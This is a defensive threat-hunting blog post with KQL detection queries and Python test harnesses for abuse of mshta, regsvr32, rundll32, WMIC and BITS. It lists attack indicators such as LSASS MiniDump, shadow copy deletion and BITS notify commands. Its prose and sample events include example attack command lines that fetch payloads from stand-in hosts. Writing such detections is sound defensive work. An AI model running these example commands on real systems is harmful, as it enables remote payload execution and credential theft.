
Detecting Living-off-the-Land (LOLBin) Attacks: KQL and SPL Queries for Microsoft Sentinel and Splunk

KQL SPL Microsoft Sentinel Splunk LOLBins MITRE ATT&CK threat hunting defense evasion detection engineering

Living-off-the-land (LOLBin) attacks are the single biggest detection gap in most SOC environments. Adversaries don’t need custom malware when Windows ships with mshta.exe, rundll32.exe, and wmic.exe — signed Microsoft binaries that antivirus ignores, application allowlists permit, and EDR tools struggle to flag without behavioral context.

This post walks through production-ready KQL and SPL detection rules for five of the most abused LOLBins, all mapped to MITRE ATT&CK. These queries are from the df00tech detection library and are ready to schedule in Microsoft Sentinel or deploy as Splunk correlation searches.

Why LOLBins Are a Detection Problem

Traditional signature-based detection fails on LOLBins by design. The binary is legitimate. The file hash is clean. The process is expected. What’s abnormal is the behavior — the parent process, the command-line arguments, the network destination, the file path where output lands.

The challenge for SOC teams is threefold:

  • Volume: These binaries execute thousands of times per day in normal operations. Writing a rule that catches attacker use without drowning analysts in false positives requires precise behavioral logic.
  • Attacker awareness: Threat actors know these binaries are trusted. They actively design their techniques to blend in — using legitimate-looking arguments, avoiding known-bad paths, chaining multiple LOLBins.
  • Coverage gaps: Most default SIEM content flags only the most obvious patterns (e.g., rundll32 calling an .exe). Real detections need to cover the full technique surface.

The queries below address all three by using multi-factor risk scoring and parent process context rather than single-indicator matching.


1. mshta.exe — HTA Execution and Remote Script Loading (T1218.005)

mshta.exe (Microsoft HTML Application Host) was designed to run .hta files. Attackers use it to execute VBScript and JavaScript inline, load remote HTML applications, and spawn shells — all using a signed Windows binary.

Common abuse patterns:

  • Phishing attachments launching mshta.exe directly from Office applications.
  • Remote URL execution via mshta.exe http://attacker.com/payload.hta.
  • Using GetObject() to load COM objects for code execution.

// Terms that should not normally appear on an mshta.exe command line
let SuspiciousPatterns = dynamic([
  "http://", "https://", "vbscript:", "javascript:",
  "GetObject", "WScript.Shell", "Shell.Application",
  "CreateObject", "ActiveXObject", "cmd.exe", "powershell"
]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "mshta.exe"
| extend RemoteURL = ProcessCommandLine has_any ("http://", "https://")
| extend InlineScript = ProcessCommandLine has_any ("vbscript:", "javascript:")
| extend GetObject = ProcessCommandLine has "GetObject"
| extend ShellInvoke = ProcessCommandLine has_any ("WScript.Shell", "Shell.Application", "CreateObject")
// Office parents are the phishing-attachment launch path; explorer.exe is a user double-click
| extend SuspiciousParent = InitiatingProcessFileName has_any (
    "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "explorer.exe")
| extend HTAPath = ProcessCommandLine has_any ("Temp", "AppData", "Downloads", "Desktop", "Public")
// Without this filter every routine mshta.exe launch in the window is returned
| where ProcessCommandLine has_any (SuspiciousPatterns) or SuspiciousParent
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
         InitiatingProcessCommandLine, RemoteURL, InlineScript, GetObject, ShellInvoke,
         SuspiciousParent, HTAPath
| sort by Timestamp desc

What to investigate: Any result where RemoteURL = true is high-confidence malicious. Treat InlineScript = true combined with SuspiciousParent = true as critical — this is the Office-macro-to-mshta execution path used by TA453, Lazarus Group, and TA571.
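Before scheduling a rule it is worth running its boolean columns and the triage ladder above against a handful of process events offline. The following Python is an added example, not code from the df00tech library or from this post: the field names mirror DeviceProcessEvents, every event is constructed, and plain substring matching stands in for KQL's term-based has operator, so it is marginally broader than the query. The same harness shape carries over to the regsvr32, rundll32, WMI and BITS rules below.

```python
"""
Offline evaluation of the mshta.exe rule logic against constructed process
events. Added example, not code from the df00tech library: field names mirror
DeviceProcessEvents, the events are made up, and the severity ladder encodes
the "What to investigate" guidance from the post.
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "explorer.exe"}
USER_WRITABLE = ("temp", "appdata", "downloads", "desktop", "public")
SHELL_TOKENS = ("wscript.shell", "shell.application", "createobject")


def mshta_indicators(event):
    """Compute the same boolean columns the KQL `extend` lines produce.
    Substring matching approximates KQL `has`, which is term-based."""
    cmd = event["ProcessCommandLine"].lower()
    parent = event["InitiatingProcessFileName"].lower()
    return {
        "RemoteURL": "http://" in cmd or "https://" in cmd,
        "InlineScript": "vbscript:" in cmd or "javascript:" in cmd,
        "GetObject": "getobject" in cmd,
        "ShellInvoke": any(t in cmd for t in SHELL_TOKENS),
        "SuspiciousParent": parent in OFFICE_PARENTS,
        "HTAPath": any(p in cmd for p in USER_WRITABLE),
    }


def triage(ind):
    """Severity ladder from the post: inline script spawned by an Office/Explorer
    parent is critical, any remote URL is high, any other single indicator is
    worth a look, and an mshta.exe launch with no indicator is informational."""
    if ind["InlineScript"] and ind["SuspiciousParent"]:
        return "critical"
    if ind["RemoteURL"]:
        return "high"
    if ind["GetObject"] or ind["ShellInvoke"] or ind["SuspiciousParent"] or ind["HTAPath"]:
        return "medium"
    return "info"


def run_rule(events):
    """Return [(DeviceName, severity)] for every mshta.exe event, highest first."""
    order = {"critical": 0, "high": 1, "medium": 2, "info": 3}
    rows = []
    for e in events:
        if e["FileName"].lower() != "mshta.exe":
            continue  # the KQL `where FileName =~ "mshta.exe"` line
        rows.append((e["DeviceName"], triage(mshta_indicators(e))))
    return sorted(rows, key=lambda r: order[r[1]])


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    # Word spawning mshta with inline VBScript: the phishing path, critical
    {"DeviceName": "WS01", "FileName": "mshta.exe", "InitiatingProcessFileName": "WINWORD.EXE",
     "ProcessCommandLine": 'mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd.exe /c echo test",0)'},
    # remote HTA fetched from a URL, high
    {"DeviceName": "WS02", "FileName": "mshta.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "mshta.exe http://payload.example/payload.hta"},
    # user double-clicked a vendor help file: explorer.exe parent only, medium
    {"DeviceName": "WS03", "FileName": "mshta.exe", "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\Help\index.hta"'},
    # same file launched by a service host: no indicator, info
    {"DeviceName": "WS04", "FileName": "mshta.exe", "InitiatingProcessFileName": "svchost.exe",
     "ProcessCommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\Help\index.hta"'},
    # not mshta at all: filtered out before scoring
    {"DeviceName": "WS05", "FileName": "powershell.exe", "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "powershell.exe -File C:\\scripts\\x.ps1"},
]

if __name__ == "__main__":
    for device, severity in run_rule(SAMPLE_EVENTS):
        print(f"{device}: {severity}")
```

The WS03 row is the one to watch when tuning: explorer.exe is in the parent list from the query, so any user double-click on a .hta lands at medium, which is where an exclusion for known vendor HTA paths would go.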

Full detection with SPL equivalent: T1218.005 — mshta


2. regsvr32.exe — Squiblydoo and Remote SCT Execution (T1218.010)

regsvr32.exe registers COM server DLLs. Attackers discovered it can also load remote scriptlet (.sct) files over HTTP via scrobj.dll — a technique called “Squiblydoo” that has been in active use since 2016 and remains effective because it’s a signed, network-capable binary that proxy solutions often whitelist.

DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "regsvr32.exe"
// Squiblydoo signature: a URL on the command line and/or scrobj.dll named as the "DLL"
| extend RemoteSCT = ProcessCommandLine has_any ("http://", "https://")
| extend ScrObj = ProcessCommandLine has "scrobj.dll"
| extend UnregisterFlag = ProcessCommandLine has_any ("/u", "/unregister")
| extend SuspiciousPath = ProcessCommandLine has_any (
    "Temp", "AppData", "Downloads", "Public", "Desktop", "ProgramData")
| extend InlineScript = ProcessCommandLine has "/i:"
| extend SuspiciousParent = InitiatingProcessFileName has_any (
    "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
// (SuspiciousPath and SuspiciousParent) or SuspiciousParent collapses to SuspiciousParent,
// so the parent check is an alert condition on its own. To require the path as well,
// replace the last term with (SuspiciousPath and SuspiciousParent).
// UnregisterFlag, SuspiciousPath and InlineScript are kept as triage columns.
| where RemoteSCT or ScrObj or SuspiciousParent
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
         InitiatingProcessCommandLine, RemoteSCT, ScrObj, UnregisterFlag, SuspiciousPath,
         InlineScript, SuspiciousParent
| sort by Timestamp desc

Tuning note: The key filter is RemoteSCT or ScrObj — any regsvr32.exe command referencing a URL or scrobj.dll is highly suspicious. The SuspiciousParent filter is your noise reducer for the path-based checks. In environments with legitimate software using regsvr32, add those parent processes to an exclusion list rather than loosening the path filters.

Full detection with SPL equivalent: T1218.010 — regsvr32


3. rundll32.exe — DLL Execution, MiniDump, and COM Hijacking (T1218.011)

rundll32.exe is one of the most abused binaries in Windows. It legitimately calls exported DLL functions — but attackers use it to execute JavaScript via mshtml, dump LSASS via comsvcs.dll MiniDump, load remote COM scriptlets, and invoke DLL exports for proxy execution.

// DLLs and export names that recur in rundll32 proxy-execution tradecraft
let SuspiciousDLLs = dynamic([
    "zipfldr.dll", "ieframe.dll", "comsvcs.dll", "shell32.dll",
    "advpack.dll", "shdocvw.dll"]);
let SuspiciousFunctions = dynamic([
    "MiniDump", "Control_RunDLL", "RunHTMLApplication",
    "LaunchINFSection", "OpenURL"]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "rundll32.exe"
| extend JavaScriptExec = ProcessCommandLine has_any ("javascript:", "mshtml", "RunHTMLApplication")
| extend RemoteSCT = ProcessCommandLine has_any ("http://", "https://", "GetObject(")
| extend MiniDump = ProcessCommandLine has "MiniDump"
| extend SuspiciousDLL = ProcessCommandLine has_any (SuspiciousDLLs)
| extend SuspiciousFunction = ProcessCommandLine has_any (SuspiciousFunctions)
| extend SuspiciousPath = ProcessCommandLine has_any (
    "Temp", "AppData", "Downloads", "Public", "Desktop")
// An export called by ordinal (",#123") keeps the function name off the command line
| extend OrdinalLoad = ProcessCommandLine matches regex @",#\d+"
| extend SuspiciousParent = InitiatingProcessFileName has_any (
    "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
// As in the regsvr32 rule, (SuspiciousPath and SuspiciousParent) or SuspiciousParent is just
// SuspiciousParent. A known-abused DLL paired with a known-abused export is added as a condition;
// shell32.dll,Control_RunDLL is how Control Panel applets launch, so exclude that pair if it is noisy.
| where JavaScriptExec or RemoteSCT or MiniDump or (SuspiciousDLL and SuspiciousFunction) or SuspiciousParent
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
         InitiatingProcessCommandLine, JavaScriptExec, RemoteSCT, MiniDump, SuspiciousDLL,
         SuspiciousFunction, SuspiciousPath, OrdinalLoad, SuspiciousParent
| sort by Timestamp desc

Priority alerts: MiniDump = true means LSASS dumping via comsvcs.dll — treat this as critical and correlate with the T1003.001 LSASS detection. JavaScriptExec = true or RemoteSCT = true is direct code execution through rundll32 and warrants immediate triage.

Full detection with SPL equivalent: T1218.011 — rundll32


4. WMIC — Remote Process Creation and Shadow Copy Deletion (T1047)

Windows Management Instrumentation is a legitimate administrative framework that attackers use for remote process creation, service manipulation, shadow copy deletion (ransomware pre-deployment), and reconnaissance. The detection needs to cover both wmic.exe commands and PowerShell’s WMI cmdlets.

let SuspiciousWmicArgs = dynamic([
  "process call create", "shadowcopy delete", "shadowcopy where",
  "/node:", "os get", "computersystem get", "service where",
  "product get", "nicconfig", "logicaldisk get", "startup list"
]);
let SuspiciousWmiPSPatterns = dynamic([
  "Invoke-WmiMethod", "Get-WmiObject", "Get-CimInstance",
  "[wmiclass]", "[wmi]", "Win32_Process", "Win32_ShadowCopy",
  "Win32_Service", "wmiexec"
]);
// Branch 1: wmic.exe invoked with arguments used for remote execution, shadow copy deletion or recon
let WmicCommands = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "wmic.exe"
| where ProcessCommandLine has_any (SuspiciousWmicArgs)
| extend DetectionBranch = "wmic_args";
// Branch 2: PowerShell reaching WMI through cmdlets or type accelerators
let WmiPowerShell = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any (SuspiciousWmiPSPatterns)
| extend DetectionBranch = "powershell_wmi";
// Branch 3: the WMI provider host spawning unexpected children; remote process creation lands here
let WmiPrvSEChildren = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName !in~ (
    "WmiPrvSE.exe", "msiexec.exe", "svchost.exe",
    "SearchIndexer.exe", "WerFault.exe", "dllhost.exe")
| extend DetectionBranch = "wmiprvse_child";
union WmicCommands, WmiPowerShell, WmiPrvSEChildren
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
         InitiatingProcessFileName, InitiatingProcessCommandLine, DetectionBranch
| sort by Timestamp desc

The ransomware signal: shadowcopy delete via WMI is a near-universal step in ransomware deployment — executed by Akira, Black Basta, LockBit, and Play before encryption begins. In Sentinel, create a separate high-severity rule specifically for wmic.exe commands containing shadowcopy with automated response to isolate the host.

Full detection with SPL equivalent: T1047 — Windows Management Instrumentation


5. BITS Jobs — Background Download and Persistence (T1197)

Background Intelligent Transfer Service is designed for bandwidth-friendly downloads (Windows Update uses it). Attackers use bitsadmin.exe and PowerShell’s Start-BitsTransfer to download payloads to writable paths and — critically — to set notification commands that execute after transfer completes, creating a persistence mechanism that survives reboots.

let SuspiciousDestinations = dynamic([
  "\\AppData\\Local\\Temp\\", "\\AppData\\Roaming\\",
  "\\Users\\Public\\", "\\ProgramData\\", "\\Windows\\Temp\\"
]);
let SuspiciousExtensions = dynamic([
  ".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta"
]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "bitsadmin.exe"
| extend HasNotify = ProcessCommandLine has_any ("/SetNotifyCmdLine", "/SetNotifyFlags")
| extend HasTransfer = ProcessCommandLine has_any ("/transfer", "/addfile")
| extend SuspiciousDest = ProcessCommandLine has_any (SuspiciousDestinations)
// Drop the executable itself before testing extensions, otherwise "bitsadmin.exe" satisfies ".exe"
| extend Args = replace_regex(ProcessCommandLine, @"(?i)^\S*bitsadmin(\.exe)?""?\s*", "")
| extend SuspiciousExt = Args has_any (SuspiciousExtensions)
// Kusto regex is RE2, which has no lookahead, so a (?!...) allowlist does not compile.
// Extract the URL and test its host instead; anchoring on the host also stops a
// ".microsoft.com" in the path, query string or userinfo from satisfying the allowlist.
| extend DownloadURL = extract(@"(https?://[^\s""']+)", 1, ProcessCommandLine)
| extend ExternalDownload = isnotempty(DownloadURL)
    and not(DownloadURL matches regex @"(?i)^https?://([^/@\s]*\.)?(microsoft|windowsupdate|windows)\.com(:\d+)?(/|$)")
| where HasNotify or HasTransfer or (SuspiciousDest and SuspiciousExt) or ExternalDownload
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
          HasNotify, HasTransfer, SuspiciousDest, SuspiciousExt, DownloadURL, ExternalDownload
| sort by Timestamp desc

The persistence indicator: HasNotify = true combined with SuspiciousDest = true means an attacker is setting up BITS to execute a payload after download. This is particularly dangerous because the notification command runs as the job’s user, persists across reboots, and leaves minimal forensic traces unless you’re specifically monitoring BITS event logs (Event IDs 59, 60, 61 in Microsoft-Windows-Bits-Client).
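The ExternalDownload column is where tuning usually goes wrong: an allowlist that only asks whether .microsoft.com appears somewhere after the URL is satisfied by a query string, by userinfo before an @ sign, or by a lookalike host. The Python below is an added example, not the post's own code or the detection library's: it reproduces that substring check for comparison and then tests the host bitsadmin would actually contact. The allowed suffixes are the three from the KQL rule; every command line is constructed.

```python
"""
Host-anchored allowlist for the ExternalDownload check in the BITS rule.
Added example, not the post's own code: naive_external() mirrors the
"no Microsoft domain anywhere after the URL" logic, external_downloads()
checks the requested host instead. All command lines are constructed samples.
"""
import re
from urllib.parse import urlsplit

ALLOWED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "windows.com")  # from the KQL rule
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _urls(cmdline):
    """Pull URLs out of a command line, trimming quotes/commas that \\S+ swallows."""
    return [u.rstrip("\"',)") for u in URL_RE.findall(cmdline)]


def naive_external(cmdline):
    """Mirror of the original check: a URL is external unless one of the
    allowlisted domains appears anywhere in the rest of the command line."""
    markers = tuple("." + s for s in ALLOWED_SUFFIXES)
    m = URL_RE.search(cmdline)
    if not m:
        return False
    rest = cmdline[m.start():].lower()
    return not any(mk in rest for mk in markers)


def host_allowed(url):
    """Allow only when the URL's host is an allowlisted domain or a subdomain of one.
    urlsplit() discards userinfo, so 'download.microsoft.com@evil' yields host 'evil'."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    return any(host == s or host.endswith("." + s) for s in ALLOWED_SUFFIXES)


def external_downloads(cmdline):
    """URLs in the command line whose host is not on the allowlist."""
    return [u for u in _urls(cmdline) if not host_allowed(u)]


# Constructed bitsadmin command lines; hosts use reserved example names.
SAMPLES = {
    "update":    "bitsadmin /transfer wu /download /priority normal "
                 "https://download.windowsupdate.com/x.cab C:\\Windows\\Temp\\x.cab",
    "plain":     "bitsadmin /transfer j /download http://files.example/agent.exe C:\\Users\\Public\\agent.exe",
    "lookalike": "bitsadmin /transfer j /download http://www.microsoft.com.files.example/a.dll C:\\ProgramData\\a.dll",
    "query":     "bitsadmin /transfer j /download http://files.example/a.ps1?ref=.microsoft.com C:\\Users\\Public\\a.ps1",
    "userinfo":  "bitsadmin /transfer j /download http://download.microsoft.com@files.example/b.exe C:\\Users\\Public\\b.exe",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:10} naive={naive_external(cmd)!s:5} host-anchored={external_downloads(cmd)}")
```

Only the "update" and "plain" samples are judged the same way by both checks; the lookalike, query-string and userinfo forms all pass the substring allowlist and are caught only by the host-anchored one.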

Full detection with SPL equivalent: T1197 — BITS Jobs


Building a LOLBin Detection Stack

These five queries cover the most commonly abused LOLBins, but effective defense requires chaining them:

Execution chains to alert on:

  • outlook.exe → mshta.exe → cmd.exe (phishing to execution)
  • powershell.exe → regsvr32.exe → network connection (Squiblydoo variant)
  • wmiprvse.exe → cmd.exe → bitsadmin.exe (WMI-based lateral movement with BITS persistence)
  • rundll32.exe with comsvcs.dll MiniDump followed by LSASS access events
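Chain detection needs process lineage rather than single events. The following Python is an added example, not part of the df00tech library or this post: it rebuilds parent/child lineage from constructed process-creation events, keyed by device and process id the way DeviceProcessEvents exposes them, and reports which of the first three chains above are present on each host. The Squiblydoo chain additionally requires a network event from the regsvr32.exe process; the rundll32/LSASS chain is left out because it needs a different event source. A chain matches as an ordered subsequence of the lineage, so an intermediate conhost.exe or an extra cmd.exe does not hide it.

```python
"""
Execution-chain matching over process-creation events.
Added example, not part of the df00tech library: field names follow
DeviceProcessEvents / DeviceNetworkEvents and all events are constructed.
"""

# Chains from the post; the last element is the process that must be the leaf.
CHAINS = {
    "phishing to execution": ["outlook.exe", "mshta.exe", "cmd.exe"],
    "Squiblydoo variant": ["powershell.exe", "regsvr32.exe"],  # plus a network connection
    "WMI lateral movement with BITS persistence": ["wmiprvse.exe", "cmd.exe", "bitsadmin.exe"],
}
NEEDS_NETWORK = {"Squiblydoo variant"}


def lineage(events, device, pid):
    """Process names from the root ancestor down to `pid` on `device`.
    Keys are (DeviceName, ProcessId) because PIDs are only unique per host;
    the `seen` set guards against loops caused by PID reuse."""
    by_key = {(e["DeviceName"], e["ProcessId"]): e for e in events}
    names, seen = [], set()
    while (device, pid) in by_key and (device, pid) not in seen:
        seen.add((device, pid))
        e = by_key[(device, pid)]
        names.append(e["FileName"].lower())
        pid = e["InitiatingProcessId"]
    return names[::-1]


def ordered_subsequence(chain, names):
    """True if every element of `chain` appears in `names` in order (gaps allowed)."""
    pos = 0
    for n in names:
        if pos < len(chain) and n == chain[pos]:
            pos += 1
    return pos == len(chain)


def find_chains(process_events, network_events=()):
    """Sorted (DeviceName, chain label) pairs present in the telemetry."""
    net_keys = {(n["DeviceName"], n["InitiatingProcessId"]) for n in network_events}
    hits = set()
    for e in process_events:
        key = (e["DeviceName"], e["ProcessId"])
        names = lineage(process_events, *key)
        for label, chain in CHAINS.items():
            if names[-1] != chain[-1] or not ordered_subsequence(chain, names):
                continue
            if label in NEEDS_NETWORK and key not in net_keys:
                continue
            hits.add((e["DeviceName"], label))
    return sorted(hits)


# Constructed sample telemetry (not real data). WS01: phishing chain plus a
# Squiblydoo chain that reaches the network. WS02: PowerShell launched regsvr32
# but no connection followed, so it must not be reported. WS03: the WMI provider
# host spawning cmd.exe, which launches bitsadmin.exe.
PROCESS_EVENTS = [
    {"DeviceName": "WS01", "ProcessId": 100, "InitiatingProcessId": 1, "FileName": "explorer.exe"},
    {"DeviceName": "WS01", "ProcessId": 200, "InitiatingProcessId": 100, "FileName": "OUTLOOK.EXE"},
    {"DeviceName": "WS01", "ProcessId": 300, "InitiatingProcessId": 200, "FileName": "mshta.exe"},
    {"DeviceName": "WS01", "ProcessId": 400, "InitiatingProcessId": 300, "FileName": "cmd.exe"},
    {"DeviceName": "WS01", "ProcessId": 500, "InitiatingProcessId": 100, "FileName": "powershell.exe"},
    {"DeviceName": "WS01", "ProcessId": 600, "InitiatingProcessId": 500, "FileName": "regsvr32.exe"},
    {"DeviceName": "WS02", "ProcessId": 500, "InitiatingProcessId": 100, "FileName": "powershell.exe"},
    {"DeviceName": "WS02", "ProcessId": 600, "InitiatingProcessId": 500, "FileName": "regsvr32.exe"},
    {"DeviceName": "WS03", "ProcessId": 10, "InitiatingProcessId": 2, "FileName": "WmiPrvSE.exe"},
    {"DeviceName": "WS03", "ProcessId": 20, "InitiatingProcessId": 10, "FileName": "cmd.exe"},
    {"DeviceName": "WS03", "ProcessId": 30, "InitiatingProcessId": 20, "FileName": "bitsadmin.exe"},
]
NETWORK_EVENTS = [
    {"DeviceName": "WS01", "InitiatingProcessId": 600, "RemoteUrl": "http://sct.example/a.sct"},
]

if __name__ == "__main__":
    for device, label in find_chains(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{device}: {label}")
```

In a SIEM the same join is a self-join of DeviceProcessEvents on InitiatingProcessId (and DeviceNetworkEvents for the Squiblydoo leg); the subsequence match is what keeps the rule from being defeated by one extra hop in the tree.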

Tuning guidance: Start with SuspiciousParent as your primary filter for all five queries before enabling path-based or argument-based detection. Office applications spawning any of these binaries is almost universally malicious; expand from there once you’ve established a baseline.

Coverage beyond LOLBins: If these detections are triggering alerts, check for associated lateral movement techniques — LOLBin abuse rarely happens in isolation. Remote WMI execution in particular (the /node: flag in wmic.exe) is usually accompanied by pass-the-hash or pass-the-ticket for credential reuse.


Browse the full detection library for 700+ KQL and SPL rules mapped to MITRE ATT&CK, covering all major tactics from initial access through exfiltration.